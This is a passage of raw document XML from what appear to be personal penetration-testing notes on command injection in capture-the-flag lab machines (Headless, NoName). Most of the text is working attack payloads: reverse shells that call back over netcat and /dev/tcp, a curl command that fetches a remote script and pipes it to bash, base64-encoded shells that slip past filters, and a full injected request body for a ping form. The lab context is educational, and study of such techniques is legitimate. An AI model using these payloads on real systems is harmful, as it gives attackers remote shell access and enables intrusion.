    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D84">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D85">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">test;curl${IFS}http://&lt;IP&gt;:&lt;PORT&gt;/rev.sh|bash;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D86">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="273"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Put this in username field and press enter</w:t>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r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D89">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bash reverse shell for command injection (from Headless HTB):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D8A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1139"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc 10.10.14.41 4444 -e /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D8B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1139"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">+nc+10.10.14.41+4444+-e+/bin/bash </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D8C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1139"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For URL encoding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D8D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1139"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is what the whole request body looked like:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D8E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1139"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">date=2023-09-15;+nc+10.10.14.41+4444+-e+/bin/bash</w:t>
      </w:r>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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_6xjb5ayfzaim" w:id="120"/>
      <w:bookmarkEnd w:id="120"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using the | (pipe) for command injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D92">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId293">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">NoName</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, we finally saw a new method of command injection! We had a "ping" functionality, where we type in an IP address inside of a textbox and then press "Submit Query" and then the ping output will show on screen.</w:t>
      </w:r>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, we submitted this command injection:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D95">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="988"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1 | id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D96">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1651000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="16" name="image14.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image14.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId294"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="165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97">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1044"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We got a successful command injection</w:t>
      </w:r>
    </w:p>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t xml:space="preserve">This is the pipe command, and it will make it so that the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" command is run. </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We then try uploading a reverse shell but it didn't work since there was a blacklist for letters. So, we had to encode base64.</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pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_xhl7axrvhvdx" w:id="121"/>
      <w:bookmarkEnd w:id="121"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Base64 encoding reverse shell</w:t>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Example seen in </w:t>
      </w:r>
      <w:hyperlink r:id="rId295">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Zab</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DA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First they encoded it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DA1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo ‘bash -i &gt;&amp; /dev/tcp/192.168.45.154/443 0&gt;&amp;1’ | base64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then this was their final payload that they want to be run in bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DA3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ1LjE1NC80NDMgMD4mMQo= | base64 -d | /bin/bash</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r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DA6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is what the final command should look like:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="211"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo '&lt;BASE64_STRING&gt;' | base64 -d | bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DA8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="211"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You pass this into the command injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DA9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="211"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash -c "echo &lt;BASE64_STRING&gt; | base64 -d | bash"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DAA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="211"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the full form, to specify bash, but if it's already running bash then you don't need bash -c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DAB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="211"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash -c</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> means run the following as a command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DAC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="211"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you don't include </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-c</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, then it will think the following is a file that it's supposed to run. Like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash example.sh</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1228"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo -n 'BASE64_STRING' | base64 -d | sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DAF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1228"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You pass this into the command injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DB0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1228"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sh -c 'echo -n "BASE64_STRING" | base64 -d | sh'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1228"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This one is the sh variant </w:t>
      </w:r>
    </w:p>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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They used this reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DB5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1041"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2&gt;&amp;1|nc 192.168.45.208 443 &gt;/tmp/f</w:t>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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Base 64 encode it:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo -n &lt;rev_shell&gt; | base64 -d | bash </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DB9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DBA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Start a listener:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DBB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:ind w:left="72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t xml:space="preserve">Edit the burpsuite request to run the ping command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DBE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1122"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pinger=127.0.0.1+|echo+-n+"cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL2Jhc2ggLWkgMj4mMXxuYyAxOTIuMTY4LjQ1LjIwOCA0NDMgPi90bXAvZg=="+|+base64+-d+|bash&amp;submitt=Submit+Querypinger=127.0.0.1+|echo+-n+"cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL2Jhc2ggLWkgMj4mMXxuYyAxOTIuMTY4LjQ1LjIwOCA0NDMgPi90bXAvZg=="+|+base64+-d+|bash&amp;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">submitt=Submit+Query</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DBF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1122"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The "submitt=Submit+Query" is just the second argument. It's specific to this website, so no worries if your website doesn't have it if you are doing another box</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DC0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DC1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_116r9vjqd43x" w:id="122"/>
      <w:bookmarkEnd w:id="122"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Other command injections to try:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DC2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You could also try:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DC3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="321"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1; id → semicolon runs id no matter what.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DC4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="321"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
